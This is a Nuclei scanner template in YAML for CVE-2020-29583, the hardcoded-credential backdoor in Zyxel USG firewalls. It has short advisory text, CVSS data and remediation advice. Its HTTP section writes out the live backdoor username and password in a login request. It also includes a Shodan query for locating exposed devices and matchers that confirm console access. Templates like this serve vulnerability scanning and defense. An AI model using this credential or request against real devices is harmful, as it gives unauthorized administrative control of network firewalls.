57 lines
2.1 KiB
YAML
57 lines
2.1 KiB
YAML
id: CVE-2020-29583
|
|
|
|
info:
|
|
name: ZyXel USG - Hardcoded Credentials
|
|
author: canberbamber
|
|
severity: critical
|
|
description: |
|
|
A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network.
|
|
remediation: |
|
|
Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.
|
|
reference:
|
|
- https://www.zyxel.com/support/CVE-2020-29583.shtml
|
|
- https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29583
|
|
- https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
|
|
- http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-29583
|
|
cwe-id: CWE-522
|
|
epss-score: 0.96219
|
|
epss-percentile: 0.99483
|
|
cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: zyxel
|
|
product: usg20-vpn_firmware
|
|
shodan-query: title:"USG FLEX 100"
|
|
tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
GET /ext-js/index.html HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- 'data-qtip="Web Console'
|
|
- 'CLI'
|
|
- 'Configuration"></a>'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402205064009da027752d122ecf0014ab308168a1bc00b4b71c52380ea84c25f8d24502207f9d7991e9122052d9ecf249bf0e2129e660d62d0a04ae025cd5e64b1d57619d:922c64590222798bb761d5b6d8e72950 |